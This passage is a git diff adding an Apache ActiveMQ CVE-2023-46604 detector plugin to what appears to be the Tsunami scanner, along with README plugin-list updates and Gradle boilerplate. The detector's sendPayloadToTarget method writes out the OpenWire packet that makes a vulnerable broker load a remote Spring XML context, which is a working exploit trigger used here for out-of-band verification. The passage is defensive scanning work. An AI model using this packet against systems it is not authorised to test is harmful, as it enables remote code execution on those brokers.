diff --git a/README.md b/README.md index d51b22dcd..026fefec7 100644 --- a/README.md +++ b/README.md @@ -7,6 +7,31 @@ Security Scanner plugins. Read how to [contribute to Tsunami](docs/contributing.md). + +## Currently released Tsunami plugins + +### Detectors +#### AI Relevant OSS +* [Pytorch Serve Expose API Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/google/detectors/exposedui/pytorch_serve) +* [Ray CVE-2023-48022 Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/google/detectors/rce/ai/cve202348022) +* [Ray CVE-2023-6019 Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/google/detectors/rce/ai/cve20236019) +* [H2O CVE-2023-6018 Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/google/detectors/rce/ai/cve20236018) +* [MLflow CVE-2023-6977 & CVE-2023-1177 & CVE-2023-2780 Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/mlflow_cve_2023_6977) +* [MLflow CVE-2023-6014 Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/mlflow_cve_2023_6014) +* [MLflow Weak Credential Detector](https://github.com/google/tsunami-security-scanner-plugins/blob/master/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/mlflow/MlFlowCredentialTester.java) +* [Argo Workflow Exposed API Detector](https://github.com/google/tsunami-security-scanner-plugins/blob/master/google/detectors/exposedui/argoworkflow/) +* [MinIO Sensitive Info Disclosure Detector](https://github.com/google/tsunami-security-scanner-plugins/blob/master/community/detectors/minio_cve_2023_28432/) +* [Gradio CVE-2023-51449 Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/gradio_cve_2023_51449) +* [Apache Spark CVE-2022-33891 Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/apache_spark_cve_2022_33891) +* [Apache Spark Expose UI Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/apache_spark_exposed_webui) +* [Apache Spark Exposed API Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/rce/apache_spark_exposed_api) +* [Apache Airflow CVE-2020-17526 Auth Bypass RCE](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/apache_airflow_cve_2020_17526) +* [Triton Inference Server RCE](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/triton_inference_server_model_overwrite) +* [Intel Neural Compressor CVE-2024-22476 RCE Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/intel_neural_compressor_cve_2024_22476) +* [ZenML Weak Credential Detector](https://github.com/google/tsunami-security-scanner-plugins/blob/master/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/zenml/ZenMlCredentialTester.java) +* [Argo CD Exposed UI](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/argocd_exposed_ui) +* [Airflow Exposed UI](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/apache_airflow_exposed_ui) + ## Source Code Headers Every file containing source code must include copyright and license diff --git a/community/README.md b/community/README.md index f462bce40..d0e0e9866 100644 --- a/community/README.md +++ b/community/README.md @@ -19,10 +19,21 @@ This directory contains plugins contributed by community members. * [CVE-2021-29441 Nacos < 1.4.1 Authentication Bypass](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/nacos_cve_2021_29441) #### Remote Code Execution + * [Apache Druid Pre-Auth RCE vulnerability (CVE-2021-25646) Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/apache_druid_preauth_rce_cve_2021_25646) * [Forgerock AM/OpenAM RCE (CVE-2021-35464) Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/rce/cve202135464) -* [GitLab CE/EE Unauthenticated RCE using ExifTool and disclosure vulnerability (CVE-2021-29441)](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/gitlab_cve_2021_22205) -* [Unauthenticated RCE in Laravel <= 8.4.2 using Debug Mode (CVE-2021-3129) Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/laravel_cve_2021_3129) -* [CVE-2021-26084 Confluence Server RCE via Pre-Auth OGNL Injection (CVE-2021-26084) Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/confluence_cve_2021_26084) +* [GitLab CE/EE Unauthenticated RCE using ExifTool and disclosure + vulnerability + (CVE-2021-29441)](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/gitlab_cve_2021_22205) +* [Unauthenticated RCE in Laravel <= 8.4.2 using Debug Mode (CVE-2021-3129) + Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/laravel_cve_2021_3129) +* [CVE-2021-26084 Confluence Server RCE via Pre-Auth OGNL Injection + (CVE-2021-26084) + Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/confluence_cve_2021_26084) * [CVE-2022-22965 Spring Framework RCE (CVE-2022-22965) Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/spring_framework_cve_2022_22965) * [Spring Cloud Function CVE-2022-22963 VulnDetector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/spring_cloud_function_cve_2022_22963) +* [Apache Spark Exposed API VulnDetector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/rce/apache_spark_exposed_api) + +#### Information Disclosure + +* [Apache Sparks exposed Web UI Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/apache_spark_exposed_webui) diff --git a/community/detectors/apache_activemq_cve_2023_46604/README.md b/community/detectors/apache_activemq_cve_2023_46604/README.md new file mode 100644 index 000000000..f08619a75 --- /dev/null +++ b/community/detectors/apache_activemq_cve_2023_46604/README.md @@ -0,0 +1,17 @@ +# Apache ActiveMQ RCE CVE-2023-46604 Detector + +This detector checks for Apache ActiveMQ RCE vulnerability (CVE-2023-46604). + +- https://activemq.apache.org/news/cve-2023-46604 +- https://github.com/advisories/GHSA-crg9-44h2-xw35 +- https://nvd.nist.gov/vuln/detail/CVE-2023-46604 + +## Build jar file for this plugin + +Using `gradlew`: + +```shell +./gradlew jar +``` + +Tsunami identifiable jar file is located at `build/libs` directory. diff --git a/community/detectors/apache_activemq_cve_2023_46604/build.gradle b/community/detectors/apache_activemq_cve_2023_46604/build.gradle new file mode 100644 index 000000000..09e4bcce3 --- /dev/null +++ b/community/detectors/apache_activemq_cve_2023_46604/build.gradle @@ -0,0 +1,73 @@ +plugins { + id 'java-library' +} + +description = 'Tsunami Apache ActiveMQ RCE (CVE-2023-46604) VulnDetector plugin.' +group 'com.google.tsunami' +version '0.0.1-SNAPSHOT' + + +repositories { + maven { // The google mirror is less flaky than mavenCentral() + url 'https://maven-central.storage-download.googleapis.com/repos/central/data/' + } + mavenCentral() + mavenLocal() +} + +java { + sourceCompatibility = JavaVersion.VERSION_11 + targetCompatibility = JavaVersion.VERSION_11 + + jar.manifest { + attributes('Implementation-Title': name, + 'Implementation-Version': version, + 'Built-By': System.getProperty('user.name'), + 'Built-JDK': System.getProperty('java.version'), + 'Source-Compatibility': sourceCompatibility, + 'Target-Compatibility': targetCompatibility) + } + + javadoc.options { + encoding = 'UTF-8' + use = true + links 'https://docs.oracle.com/javase/8/docs/api/' + } + + // Log stacktrace to console when test fails. + test { + testLogging { + exceptionFormat = 'full' + showExceptions true + showCauses true + showStackTraces true + } + maxHeapSize = '1500m' + } +} + +ext { + tsunamiVersion = 'latest.release' + junitVersion = '4.13' + mockitoVersion = '2.28.2' + truthVersion = '1.0.1' + okhttpVersion = '3.12.0' + apacheActiveMqClientVersion = '5.18.4' + guiceVersion = '4.2.3' +} + +dependencies { + implementation "com.google.tsunami:tsunami-common:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-plugin:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-proto:${tsunamiVersion}" + implementation "org.apache.activemq:activemq-client:${apacheActiveMqClientVersion}" + + testImplementation "junit:junit:${junitVersion}" + testImplementation "org.mockito:mockito-core:${mockitoVersion}" + testImplementation "com.google.truth:truth:${truthVersion}" + testImplementation "com.squareup.okhttp3:mockwebserver:${okhttpVersion}" + testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-proto-extension:${truthVersion}" + testImplementation "com.google.inject:guice:${guiceVersion}" + testImplementation "com.google.inject.extensions:guice-testlib:${guiceVersion}" +} diff --git a/community/detectors/apache_activemq_cve_2023_46604/gradle/wrapper/gradle-wrapper.jar b/community/detectors/apache_activemq_cve_2023_46604/gradle/wrapper/gradle-wrapper.jar new file mode 100644 index 000000000..2c3521197 Binary files /dev/null and b/community/detectors/apache_activemq_cve_2023_46604/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/mlflow_cve_2023_1177/gradle/wrapper/gradle-wrapper.properties b/community/detectors/apache_activemq_cve_2023_46604/gradle/wrapper/gradle-wrapper.properties similarity index 94% rename from community/detectors/mlflow_cve_2023_1177/gradle/wrapper/gradle-wrapper.properties rename to community/detectors/apache_activemq_cve_2023_46604/gradle/wrapper/gradle-wrapper.properties index 8f9797cb5..d04736436 100644 --- a/community/detectors/mlflow_cve_2023_1177/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/apache_activemq_cve_2023_46604/gradle/wrapper/gradle-wrapper.properties @@ -1,6 +1,6 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip networkTimeout=10000 validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME diff --git a/community/detectors/apache_activemq_cve_2023_46604/gradlew b/community/detectors/apache_activemq_cve_2023_46604/gradlew new file mode 100755 index 000000000..f5feea6d6 --- /dev/null +++ b/community/detectors/apache_activemq_cve_2023_46604/gradlew @@ -0,0 +1,252 @@ +#!/bin/sh + +# +# Copyright © 2015-2021 the original authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 +# + +############################################################################## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/platforms/jvm/plugins-application/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# +############################################################################## + +# Attempt to set APP_HOME + +# Resolve links: $0 may be a link +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac +done + +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd -P "${APP_HOME:-./}" > /dev/null && printf '%s +' "$PWD" ) || exit + +# Use the maximum available, or set MAX_FD != -1 to use that value. +MAX_FD=maximum + +warn () { + echo "$*" +} >&2 + +die () { + echo + echo "$*" + echo + exit 1 +} >&2 + +# OS specific support (must be 'true' or 'false'). +cygwin=false +msys=false +darwin=false +nonstop=false +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; +esac + +CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar + + +# Determine the Java command to use to start the JVM. +if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD=$JAVA_HOME/jre/sh/java + else + JAVACMD=$JAVA_HOME/bin/java + fi + if [ ! -x "$JAVACMD" ] ; then + die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +else + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +fi + +# Increase the maximum file descriptors if we can. +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac +fi + +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. + +# For Cygwin or MSYS, switch paths to Windows format before running java +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + + # Now convert the arguments - kludge to limit ourselves to /bin/sh + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) + fi + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg + done +fi + + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' + +exec "$JAVACMD" "$@" diff --git a/community/detectors/apache_activemq_cve_2023_46604/gradlew.bat b/community/detectors/apache_activemq_cve_2023_46604/gradlew.bat new file mode 100644 index 000000000..9d21a2183 --- /dev/null +++ b/community/detectors/apache_activemq_cve_2023_46604/gradlew.bat @@ -0,0 +1,94 @@ +@rem +@rem Copyright 2015 the original author or authors. +@rem +@rem Licensed under the Apache License, Version 2.0 (the "License"); +@rem you may not use this file except in compliance with the License. +@rem You may obtain a copy of the License at +@rem +@rem https://www.apache.org/licenses/LICENSE-2.0 +@rem +@rem Unless required by applicable law or agreed to in writing, software +@rem distributed under the License is distributed on an "AS IS" BASIS, +@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +@rem See the License for the specific language governing permissions and +@rem limitations under the License. +@rem +@rem SPDX-License-Identifier: Apache-2.0 +@rem + +@if "%DEBUG%"=="" @echo off +@rem ########################################################################## +@rem +@rem Gradle startup script for Windows +@rem +@rem ########################################################################## + +@rem Set local scope for the variables with windows NT shell +if "%OS%"=="Windows_NT" setlocal + +set DIRNAME=%~dp0 +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused +set APP_BASE_NAME=%~n0 +set APP_HOME=%DIRNAME% + +@rem Resolve any "." and ".." in APP_HOME to make it shorter. +for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi + +@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" + +@rem Find java.exe +if defined JAVA_HOME goto findJavaFromJavaHome + +set JAVA_EXE=java.exe +%JAVA_EXE% -version >NUL 2>&1 +if %ERRORLEVEL% equ 0 goto execute + +echo. 1>&2 +echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 1>&2 + +goto fail + +:findJavaFromJavaHome +set JAVA_HOME=%JAVA_HOME:"=% +set JAVA_EXE=%JAVA_HOME%/bin/java.exe + +if exist "%JAVA_EXE%" goto execute + +echo. 1>&2 +echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 1>&2 + +goto fail + +:execute +@rem Setup the command line + +set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar + + +@rem Execute Gradle +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* + +:end +@rem End local scope for the variables with windows NT shell +if %ERRORLEVEL% equ 0 goto mainEnd + +:fail +rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of +rem the _cmd.exe /c_ return code! +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% + +:mainEnd +if "%OS%"=="Windows_NT" endlocal + +:omega diff --git a/community/detectors/apache_activemq_cve_2023_46604/settings.gradle b/community/detectors/apache_activemq_cve_2023_46604/settings.gradle new file mode 100644 index 000000000..ca0e41a24 --- /dev/null +++ b/community/detectors/apache_activemq_cve_2023_46604/settings.gradle @@ -0,0 +1 @@ +rootProject.name = 'apache_activemq_cve_2023_46604' diff --git a/community/detectors/apache_activemq_cve_2023_46604/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202346604/Annotations.java b/community/detectors/apache_activemq_cve_2023_46604/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202346604/Annotations.java new file mode 100644 index 000000000..aba28f36e --- /dev/null +++ b/community/detectors/apache_activemq_cve_2023_46604/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202346604/Annotations.java @@ -0,0 +1,35 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.cves.cve202346604; + +import static java.lang.annotation.ElementType.FIELD; +import static java.lang.annotation.ElementType.METHOD; +import static java.lang.annotation.ElementType.PARAMETER; + +import java.lang.annotation.Retention; +import java.lang.annotation.RetentionPolicy; +import java.lang.annotation.Target; +import javax.inject.Qualifier; + +/** Annotation for {@link Cve202346604Detector}. */ +final class Annotations { + private Annotations() {} + + @Qualifier + @Retention(RetentionPolicy.RUNTIME) + @Target({PARAMETER, METHOD, FIELD}) + @interface OobSleepDuration {} +} diff --git a/community/detectors/apache_activemq_cve_2023_46604/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202346604/Cve202346604Detector.java b/community/detectors/apache_activemq_cve_2023_46604/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202346604/Cve202346604Detector.java new file mode 100644 index 000000000..2511e2a7f --- /dev/null +++ b/community/detectors/apache_activemq_cve_2023_46604/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202346604/Cve202346604Detector.java @@ -0,0 +1,278 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.cves.cve202346604; + +import static com.google.common.base.Preconditions.checkNotNull; +import static com.google.common.collect.ImmutableList.toImmutableList; + +import com.google.common.annotations.VisibleForTesting; +import com.google.common.collect.ImmutableList; +import com.google.common.flogger.GoogleLogger; +import com.google.common.net.HostAndPort; +import com.google.common.util.concurrent.Uninterruptibles; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.data.NetworkEndpointUtils; +import com.google.tsunami.common.time.UtcClock; +import com.google.tsunami.plugin.PluginType; +import com.google.tsunami.plugin.VulnDetector; +import com.google.tsunami.plugin.annotations.ForServiceName; +import com.google.tsunami.plugin.annotations.PluginInfo; +import com.google.tsunami.plugin.payload.Payload; +import com.google.tsunami.plugin.payload.PayloadGenerator; +import com.google.tsunami.plugins.detectors.cves.cve202346604.Annotations.OobSleepDuration; +import com.google.tsunami.proto.AdditionalDetail; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.PayloadGeneratorConfig; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.TextData; +import com.google.tsunami.proto.TransportProtocol; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.DataInputStream; +import java.io.DataOutputStream; +import java.io.IOException; +import java.io.OutputStream; +import java.lang.annotation.Retention; +import java.lang.annotation.RetentionPolicy; +import java.net.Socket; +import java.time.Clock; +import java.time.Duration; +import java.time.Instant; +import java.util.Map; +import javax.inject.Inject; +import javax.inject.Qualifier; +import javax.net.SocketFactory; +import org.apache.activemq.util.MarshallingSupport; + +/** A {@link VulnDetector} that detects the CVE-2023-46604 vulnerability. */ +@PluginInfo( + type = PluginType.VULN_DETECTION, + name = "Apache ActiveMQ RCE CVE-2023-46604 Detector", + version = "0.1", + description = Cve202346604Detector.VULN_DESCRIPTION_OF_OOB_VERIFY, + author = "hh-hunter", + bootstrapModule = Cve202346604DetectorBootstrapModule.class) +@ForServiceName({"apachemq"}) +public final class Cve202346604Detector implements VulnDetector { + + @VisibleForTesting + static final String VULN_DESCRIPTION_OF_OOB_VERIFY = + "Apache ActiveMQ is vulnerable to Remote Code Execution (RCE). This vulnerability could allow" + + " a remote attacker with network access to a broker to execute arbitrary shell commands" + + " by manipulating serialized class types within the OpenWire protocol, causing the" + + " broker to instantiate any class on the classpath. The presence of this vulnerability" + + " was confirmed through an out-of-band callback."; + + @VisibleForTesting + static final String VULN_DESCRIPTION_OF_VERSION = + "Apache ActiveMQ is susceptible to a Remote Code Execution (RCE) vulnerability. This flaw" + + " could enable a remote attacker with network access to a broker to execute arbitrary" + + " shell commands by manipulating serialized class types within the OpenWire protocol," + + " thereby causing the broker to instantiate any class on the classpath. Although the" + + " vulnerability was identified based on the server's version number, it has not been" + + " verified."; + + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + + private static final ImmutableList SECURE_VERSIONS = + ImmutableList.of("5.15.16", "5.16.7", "5.17.6", "5.18.3"); + + private final Clock utcClock; + private final SocketFactory socketFactory; + private final PayloadGenerator payloadGenerator; + private final int oobSleepDuration; + + private boolean useOobVerifyVulnerable; + + private String currentVersion; + + @Inject + Cve202346604Detector( + @UtcClock Clock utcClock, + @SocketFactoryInstance SocketFactory socketFactory, + PayloadGenerator payloadGenerator, + @OobSleepDuration int oobSleepDuration) { + this.utcClock = checkNotNull(utcClock); + this.socketFactory = checkNotNull(socketFactory); + this.payloadGenerator = checkNotNull(payloadGenerator); + this.oobSleepDuration = oobSleepDuration; + } + + public static boolean checkVersionIsSecure(String currentVersion) { + String[] parts1 = currentVersion.split("\\."); + for (String secureVersion : SECURE_VERSIONS) { + String[] parts2 = secureVersion.split("\\."); + if (parts1[0].equals(parts2[0])) { + if (parts1[1].equals(parts2[1])) { + return Integer.parseInt(parts1[2]) >= Integer.parseInt(parts2[2]); + } + } + } + // If no secure minor version matches the current version, it's considered not secure by + // default. + return false; + } + + @Override + public DetectionReportList detect( + TargetInfo targetInfo, ImmutableList matchedServices) { + logger.atInfo().log("CVE-2023-46604 starts detecting."); + + return DetectionReportList.newBuilder() + .addAllDetectionReports( + matchedServices.stream() + .filter(this::isTransportProtocolTcp) + .filter(this::isServiceVulnerable) + .map(networkService -> buildDetectionReport(targetInfo, networkService)) + .collect(toImmutableList())) + .build(); + } + + private boolean isTransportProtocolTcp(NetworkService networkService) { + return TransportProtocol.TCP.equals(networkService.getTransportProtocol()); + } + + private boolean isServiceVulnerable(NetworkService networkService) { + HostAndPort hp = NetworkEndpointUtils.toHostAndPort(networkService.getNetworkEndpoint()); + currentVersion = getServerVersion(hp.getHost(), hp.getPort()); + if (checkVersionIsSecure(currentVersion)) { + logger.atInfo().log("The target version %s is not susceptible.", currentVersion); + return false; + } + + PayloadGeneratorConfig config = + PayloadGeneratorConfig.newBuilder() + .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.SSRF) + .setInterpretationEnvironment( + PayloadGeneratorConfig.InterpretationEnvironment.INTERPRETATION_ANY) + .setExecutionEnvironment(PayloadGeneratorConfig.ExecutionEnvironment.EXEC_ANY) + .build(); + + Payload payload = this.payloadGenerator.generate(config); + if (!payload.getPayloadAttributes().getUsesCallbackServer()) { + return true; + } + useOobVerifyVulnerable = true; + try { + boolean sendPayloadResult = this.sendPayloadToTarget(hp.getHost(), hp.getPort(), payload); + if (!sendPayloadResult) { + logger.atInfo().log("Send payload to target %s failed", hp.toString()); + return false; + } + + Uninterruptibles.sleepUninterruptibly(Duration.ofSeconds(oobSleepDuration)); + + if (payload.checkIfExecuted()) { + logger.atInfo().log("Target %s is vulnerable", hp.toString()); + return true; + } else { + logger.atInfo().log("Target %s is not vulnerable", hp.toString()); + return false; + } + } catch (Exception e) { + logger.atWarning().withCause(e).log("Request to target %s failed", hp.toString()); + } + return false; + } + + // Generate payload for Apache ActiveMQ RCE(CVE-2023-46604), and use socket to send payload + private boolean sendPayloadToTarget(String host, int port, Payload payload) { + try { + String payloadString = payload.getPayload(); + if (!payloadString.startsWith("http://") && !payloadString.startsWith("https://")) { + payloadString = "http://" + payloadString; + } + Socket socket = socketFactory.createSocket(host, port); + OutputStream os = socket.getOutputStream(); + DataOutputStream dos = new DataOutputStream(os); + // Size + dos.writeInt(0); + // Type + dos.writeByte(31); + // CommandId + dos.writeInt(0); + // Command response required + dos.writeBoolean(false); + // CorrelationId + dos.writeInt(0); + // body + dos.writeBoolean(true); + // UTF + dos.writeBoolean(true); + dos.writeUTF("org.springframework.context.support.ClassPathXmlApplicationContext"); + dos.writeBoolean(true); + dos.writeUTF(payloadString); + + dos.close(); + os.close(); + socket.close(); + return true; + } catch (IOException 